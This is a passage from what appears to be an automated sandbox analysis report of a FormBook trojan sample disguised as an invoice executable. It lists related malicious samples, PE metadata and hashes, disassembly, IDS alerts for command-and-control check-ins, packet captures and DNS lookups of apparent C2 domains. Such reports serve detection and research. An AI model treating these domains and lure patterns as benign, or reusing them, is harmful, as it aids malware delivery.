	REQUEST FOR QUOTATION.xlsx	Get hash	malicious	Browse	198.185.159.144
	REQUEST_FOR_QUOTATION.xlsx	Get hash	malicious	Browse	198.185.159.144
	Bank_Form.xlsx	Get hash	malicious	Browse	198.185.159.144
	VehlhMIUhe.exe	Get hash	malicious	Browse	198.185.159.144
	qInGJase6W.exe	Get hash	malicious	Browse	198.185.159.144
	im6t4lGifz.exe	Get hash	malicious	Browse	198.185.159.144
	VoWfhUDRLM.exe	Get hash	malicious	Browse	198.185.159.144
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	198.185.159.144
	JFBlvEr5H9.exe	Get hash	malicious	Browse	198.185.159.144
	PO64259,pdf.exe	Get hash	malicious	Browse	198.185.159.144
	PO_0008.exe	Get hash	malicious	Browse	198.185.159.144
	Payment.exe	Get hash	malicious	Browse	198.185.159.144
	auhToVTQTs.exe	Get hash	malicious	Browse	198.185.159.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	yjwVjkTFpI.exe	Get hash	malicious	Browse	23.21.168.151
	INVOICES.exe	Get hash	malicious	Browse	52.20.84.62
	OzW9U3k1r8	Get hash	malicious	Browse	54.22.85.141
	eOtLRCQr22	Get hash	malicious	Browse	18.206.13.137
	gCt2Uvhj67	Get hash	malicious	Browse	184.73.4.196
	tWSTvf0HHo	Get hash	malicious	Browse	34.239.29.231
	KoknEiNL8U	Get hash	malicious	Browse	52.4.132.119
	leMKuKe7Ou	Get hash	malicious	Browse	107.23.53.44
	d71jxmnvUx	Get hash	malicious	Browse	100.29.74.105
	X2cdt24yYt	Get hash	malicious	Browse	54.197.244.45
	fL3XyDrYfF	Get hash	malicious	Browse	18.214.171.39
	l9Ix5r5wGZ	Get hash	malicious	Browse	100.24.190.2
	RFQ-02020.exe	Get hash	malicious	Browse	3.223.115.185
	69vQIi0V4Q.exe	Get hash	malicious	Browse	50.16.246.238
	fa_rss.exe	Get hash	malicious	Browse	34.195.48.210
	20210805-000100 001001099.xls.exe	Get hash	malicious	Browse	18.234.20.119
	FEcNNpCMBf	Get hash	malicious	Browse	44.209.233.128
	setup.exe	Get hash	malicious	Browse	54.243.179.139
	GoTo Opener.dmg	Get hash	malicious	Browse	35.169.231.124
	OOi3l6F7uQ.exe	Get hash	malicious	Browse	35.172.94.1
PLI-ASCH	RImEiyD8Wt.exe	Get hash	malicious	Browse	81.17.18.198
	Enquiry.exe	Get hash	malicious	Browse	81.17.29.149
	Banco do Brasil_eDeclara#U00e7#U00e3o_SMX_046_6-08-2021_SWIFT.COPY.exe	Get hash	malicious	Browse	81.17.29.150
	57A8E3AD1ACABF0501BAB394FABE4BF264DA09987FA4D.exe	Get hash	malicious	Browse	81.17.29.148
	vbc.exe	Get hash	malicious	Browse	81.17.29.150
	NEW ORDER.xlsx	Get hash	malicious	Browse	81.17.29.149
	PO_0008.exe	Get hash	malicious	Browse	81.17.18.194
	k0INCz463k.exe	Get hash	malicious	Browse	81.17.18.196
	Postal Financial Services.doc	Get hash	malicious	Browse	179.43.187.131
	F63V4i8eZU.exe	Get hash	malicious	Browse	81.17.18.196
	PROFORMA_INVOICE.xlsx	Get hash	malicious	Browse	81.17.18.198
	jnl3kWNWWS.exe	Get hash	malicious	Browse	81.17.18.198
	F7Gk1sIX5R.exe	Get hash	malicious	Browse	179.43.174.171
	C0TEsC936Q.exe	Get hash	malicious	Browse	81.17.18.197
	NEW ORDER.xlsx	Get hash	malicious	Browse	179.43.183.46
	UxcFJmsTlr.exe	Get hash	malicious	Browse	176.223.112.130
	UxcFJmsTlr.exe	Get hash	malicious	Browse	176.223.112.130
	PR9Hc4n9Vg.exe	Get hash	malicious	Browse	179.43.158.15
	GYrZTFjj6s.exe	Get hash	malicious	Browse	179.43.160.77
	zMb2EmbK6P.exe	Get hash	malicious	Browse	179.43.175.71

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.753297595415183
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	INVOICE_90990_PDF.exe
File size:	304901
MD5:	3e94bee073a286e8b446e87a126dde1e
SHA1:	bf461d7bc78fd36eb06ca49e4e02c3bc06897905
SHA256:	85951f6ce24ad0c5e5a73c26b48dca2c9e013b554639e46dbf02bffd56cf1891
SHA512:	62f69bdcf76a8d03be76fbc3f9e92690dac88b5bcebb127b0ccf1c5fee63d7c3a22bcf49810ae7294aa2828618e0403a7cc5e61e5b6b492f3704b9e2b456e2a1
SSDEEP:	6144:K88JIphcJQgx6nTM0qnI9SIBxbJUvGlTcVvwKEEtWm4O2e1:j8JvJQ7Q3ISwxbJSGlTmEky+
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t.......t......gt......t......t......t.......t.......t...t...t..{...t..~=..t...tU..t..{...t..Rich.t.........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x402afe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x6110C602 [Mon Aug 9 06:06:58 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	8c9e2729b91e6cd98523a27cc78ab06c

Entrypoint Preview

Instruction
call 00007F1F609F5512h
jmp 00007F1F609F5133h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F1F609F52BBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F1F609F52ACh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F1F609F52AEh
add edx, 28h
cmp edx, esi
jne 00007F1F609F528Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F1F609F529Bh
call 00007F1F609F5A19h
test eax, eax
jne 00007F1F609F52A5h
xor al, al
ret
mov eax, dword ptr fs:[00000018h]
push esi
mov esi, 00415904h
mov edx, dword ptr [eax+04h]
jmp 00007F1F609F52A6h
cmp edx, eax
je 00007F1F609F52B2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F1F609F5292h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F1F609F52A9h
mov byte ptr [00415920h], 00000001h
call 00007F1F609F583Ah
call 00007F1F609F74E0h
test al, al
jne 00007F1F609F52A6h
xor al, al
pop ebp
ret
call 00007F1F609F8D95h
test al, al
jne 00007F1F609F52ACh
push 00000000h
call 00007F1F609F74F1h
pop ecx
jmp 00007F1F609F528Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi

Rich Headers

Programming Language:

[LNK] VS2015 UPD3.1 build 24215
[ C ] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x142a4	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13b30	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13b88	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x16c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdb64	0xdc00	False	0.559783380682	data	6.57010365699	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x5ab2	0x5c00	False	0.419242527174	COM executable for DOS	4.86967907888	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x15000	0x1664	0xa00	False	0.169140625	data	2.07405555382	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x17000	0xb4	0x200	False	0.205078125	data	0.920266383871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x1e0	0x200	False	0.525390625	data	4.70468074304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x18060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, VirtualProtect, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, lstrcmpW, GetFullPathNameW, MultiByteToWideChar, GetUserDefaultLCID, DecodePointer, WriteConsoleW, GetFileSize, CreateFileW, lstrcatW, GetCommandLineW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, RaiseException
USER32.dll	GetDC, GrayStringW
ADVAPI32.dll	RegOpenKeyW, RegCloseKey, RegQueryValueW
SHELL32.dll	CommandLineToArgvW
ole32.dll	CoInitialize, CLSIDFromProgID, CoUninitialize, CoCreateInstance
OLEAUT32.dll	LoadTypeLib, SysFreeString, SysAllocStringLen

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/09/21-13:10:13.291455	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49730	80	192.168.2.5	1.1.1.1
08/09/21-13:10:13.291455	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49730	80	192.168.2.5	1.1.1.1
08/09/21-13:10:13.291455	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49730	80	192.168.2.5	1.1.1.1
08/09/21-13:10:44.587192	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.5	184.168.131.241
08/09/21-13:10:44.587192	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.5	184.168.131.241
08/09/21-13:10:44.587192	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.5	184.168.131.241

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2021 13:10:02.941735029 CEST	49726	80	192.168.2.5	81.17.29.150
Aug 9, 2021 13:10:02.959606886 CEST	80	49726	81.17.29.150	192.168.2.5
Aug 9, 2021 13:10:02.959851027 CEST	49726	80	192.168.2.5	81.17.29.150
Aug 9, 2021 13:10:02.960010052 CEST	49726	80	192.168.2.5	81.17.29.150
Aug 9, 2021 13:10:02.976918936 CEST	80	49726	81.17.29.150	192.168.2.5
Aug 9, 2021 13:10:02.985369921 CEST	80	49726	81.17.29.150	192.168.2.5
Aug 9, 2021 13:10:02.985507965 CEST	80	49726	81.17.29.150	192.168.2.5
Aug 9, 2021 13:10:02.985590935 CEST	49726	80	192.168.2.5	81.17.29.150
Aug 9, 2021 13:10:02.985750914 CEST	49726	80	192.168.2.5	81.17.29.150
Aug 9, 2021 13:10:03.003621101 CEST	80	49726	81.17.29.150	192.168.2.5
Aug 9, 2021 13:10:08.050450087 CEST	49727	80	192.168.2.5	35.246.6.109
Aug 9, 2021 13:10:08.095238924 CEST	80	49727	35.246.6.109	192.168.2.5
Aug 9, 2021 13:10:08.095417976 CEST	49727	80	192.168.2.5	35.246.6.109
Aug 9, 2021 13:10:08.095585108 CEST	49727	80	192.168.2.5	35.246.6.109
Aug 9, 2021 13:10:08.140420914 CEST	80	49727	35.246.6.109	192.168.2.5
Aug 9, 2021 13:10:08.181669950 CEST	80	49727	35.246.6.109	192.168.2.5
Aug 9, 2021 13:10:08.181698084 CEST	80	49727	35.246.6.109	192.168.2.5
Aug 9, 2021 13:10:08.181874037 CEST	49727	80	192.168.2.5	35.246.6.109
Aug 9, 2021 13:10:08.181945086 CEST	49727	80	192.168.2.5	35.246.6.109
Aug 9, 2021 13:10:08.226835012 CEST	80	49727	35.246.6.109	192.168.2.5
Aug 9, 2021 13:10:13.272104979 CEST	49730	80	192.168.2.5	1.1.1.1
Aug 9, 2021 13:10:13.290395021 CEST	80	49730	1.1.1.1	192.168.2.5
Aug 9, 2021 13:10:13.291239023 CEST	49730	80	192.168.2.5	1.1.1.1
Aug 9, 2021 13:10:13.291455030 CEST	49730	80	192.168.2.5	1.1.1.1
Aug 9, 2021 13:10:13.309700966 CEST	80	49730	1.1.1.1	192.168.2.5
Aug 9, 2021 13:10:13.325337887 CEST	80	49730	1.1.1.1	192.168.2.5
Aug 9, 2021 13:10:13.325469017 CEST	80	49730	1.1.1.1	192.168.2.5
Aug 9, 2021 13:10:13.325673103 CEST	49730	80	192.168.2.5	1.1.1.1
Aug 9, 2021 13:10:13.325700998 CEST	49730	80	192.168.2.5	1.1.1.1
Aug 9, 2021 13:10:13.342459917 CEST	80	49730	1.1.1.1	192.168.2.5
Aug 9, 2021 13:10:18.390788078 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.498605967 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.498719931 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.498845100 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.607290030 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611226082 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611259937 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611285925 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611308098 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611331940 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611357927 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611383915 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611417055 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611445904 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611462116 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.611470938 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.611510038 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.654455900 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719144106 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719187021 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719211102 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719228983 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719238997 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719260931 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719264030 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719286919 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719288111 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719311953 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719335079 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719336033 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719357014 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719369888 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719381094 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719403028 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719412088 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719429970 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719451904 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719456911 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719477892 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719480038 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719502926 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719512939 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719526052 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719549894 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719554901 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719573021 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719594955 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719597101 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719621897 CEST	80	49731	198.185.159.144	192.168.2.5
Aug 9, 2021 13:10:18.719643116 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:18.719664097 CEST	49731	80	192.168.2.5	198.185.159.144
Aug 9, 2021 13:10:23.790627003 CEST	49732	80	192.168.2.5	52.20.84.62
Aug 9, 2021 13:10:23.928069115 CEST	80	49732	52.20.84.62	192.168.2.5
Aug 9, 2021 13:10:23.928287029 CEST	49732	80	192.168.2.5	52.20.84.62
Aug 9, 2021 13:10:23.928457975 CEST	49732	80	192.168.2.5	52.20.84.62
Aug 9, 2021 13:10:24.065253973 CEST	80	49732	52.20.84.62	192.168.2.5
Aug 9, 2021 13:10:24.065283060 CEST	80	49732	52.20.84.62	192.168.2.5
Aug 9, 2021 13:10:24.065291882 CEST	80	49732	52.20.84.62	192.168.2.5
Aug 9, 2021 13:10:24.065516949 CEST	49732	80	192.168.2.5	52.20.84.62
Aug 9, 2021 13:10:24.065570116 CEST	49732	80	192.168.2.5	52.20.84.62
Aug 9, 2021 13:10:24.202806950 CEST	80	49732	52.20.84.62	192.168.2.5
Aug 9, 2021 13:10:29.174052000 CEST	49733	80	192.168.2.5	85.13.128.31
Aug 9, 2021 13:10:29.212101936 CEST	80	49733	85.13.128.31	192.168.2.5
Aug 9, 2021 13:10:29.212269068 CEST	49733	80	192.168.2.5	85.13.128.31
Aug 9, 2021 13:10:29.212502003 CEST	49733	80	192.168.2.5	85.13.128.31
Aug 9, 2021 13:10:29.250255108 CEST	80	49733	85.13.128.31	192.168.2.5
Aug 9, 2021 13:10:29.250288963 CEST	80	49733	85.13.128.31	192.168.2.5
Aug 9, 2021 13:10:29.250309944 CEST	80	49733	85.13.128.31	192.168.2.5
Aug 9, 2021 13:10:29.250504971 CEST	49733	80	192.168.2.5	85.13.128.31
Aug 9, 2021 13:10:29.250535011 CEST	49733	80	192.168.2.5	85.13.128.31
Aug 9, 2021 13:10:29.289747000 CEST	80	49733	85.13.128.31	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2021 13:08:25.957531929 CEST	62060	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:25.984880924 CEST	53	62060	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:26.770174026 CEST	61805	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:26.803920984 CEST	53	61805	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:26.968508959 CEST	54795	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:27.000984907 CEST	53	54795	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:27.605870008 CEST	49557	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:27.633605003 CEST	53	49557	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:28.342395067 CEST	61733	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:28.379390955 CEST	53	61733	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:28.401499033 CEST	65447	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:28.436851025 CEST	53	65447	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:29.212697029 CEST	52441	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:29.246733904 CEST	53	52441	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:53.662429094 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:53.696991920 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 9, 2021 13:08:59.659226894 CEST	59596	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:08:59.699968100 CEST	53	59596	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:00.476264000 CEST	65296	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:00.502078056 CEST	53	65296	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:03.065097094 CEST	63183	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:03.101910114 CEST	53	63183	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:03.901076078 CEST	60151	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:03.929757118 CEST	53	60151	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:04.835117102 CEST	56969	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:04.863254070 CEST	53	56969	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:05.577146053 CEST	55161	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:05.601819992 CEST	53	55161	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:20.114197969 CEST	54757	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:20.144789934 CEST	53	54757	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:23.982944012 CEST	49992	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:24.023452997 CEST	53	49992	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:35.632966995 CEST	60075	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:35.675760031 CEST	53	60075	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:44.513653040 CEST	55016	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:44.548126936 CEST	53	55016	8.8.8.8	192.168.2.5
Aug 9, 2021 13:09:57.814306021 CEST	64345	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:09:57.853600979 CEST	53	64345	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:02.884937048 CEST	57128	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:02.936790943 CEST	53	57128	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:08.003669024 CEST	54791	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:08.049309015 CEST	53	54791	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:10.443600893 CEST	50463	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:10.491883039 CEST	53	50463	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:12.330063105 CEST	50394	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:12.385442972 CEST	53	50394	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:13.208440065 CEST	58530	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:13.270809889 CEST	53	58530	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:18.338599920 CEST	53813	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:18.384635925 CEST	53	53813	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:23.665765047 CEST	63732	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:23.788676977 CEST	53	63732	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:29.110493898 CEST	57344	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:29.172875881 CEST	53	57344	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:39.283677101 CEST	54450	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:39.350934029 CEST	53	54450	8.8.8.8	192.168.2.5
Aug 9, 2021 13:10:44.363830090 CEST	59261	53	192.168.2.5	8.8.8.8
Aug 9, 2021 13:10:44.403175116 CEST	53	59261	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 9, 2021 13:09:57.814306021 CEST	192.168.2.5	8.8.8.8	0x30d0	Standard query (0)	www.17391000.com	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:02.884937048 CEST	192.168.2.5	8.8.8.8	0x5ddb	Standard query (0)	www.zombiguitar.com	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:08.003669024 CEST	192.168.2.5	8.8.8.8	0xa41f	Standard query (0)	www.theblockmeatstore.com	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:13.208440065 CEST	192.168.2.5	8.8.8.8	0x231	Standard query (0)	www.quranvisor.com	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:18.338599920 CEST	192.168.2.5	8.8.8.8	0x5d96	Standard query (0)	www.unusualdog.com	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:23.665765047 CEST	192.168.2.5	8.8.8.8	0x9a8f	Standard query (0)	www.microprojects.net	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:29.110493898 CEST	192.168.2.5	8.8.8.8	0x7543	Standard query (0)	www.bavarian-luxury.com	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:39.283677101 CEST	192.168.2.5	8.8.8.8	0xbcd8	Standard query (0)	www.priormakers.net	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:44.363830090 CEST	192.168.2.5	8.8.8.8	0x461e	Standard query (0)	www.topelk.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 9, 2021 13:09:57.853600979 CEST	8.8.8.8	192.168.2.5	0x30d0	Name error (3)	www.17391000.com	none	none	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:02.936790943 CEST	8.8.8.8	192.168.2.5	0x5ddb	No error (0)	www.zombiguitar.com		81.17.29.150	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:08.049309015 CEST	8.8.8.8	192.168.2.5	0xa41f	No error (0)	www.theblockmeatstore.com	www250.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Aug 9, 2021 13:10:08.049309015 CEST	8.8.8.8	192.168.2.5	0xa41f	No error (0)	www250.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Aug 9, 2021 13:10:08.049309015 CEST	8.8.8.8	192.168.2.5	0xa41f	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
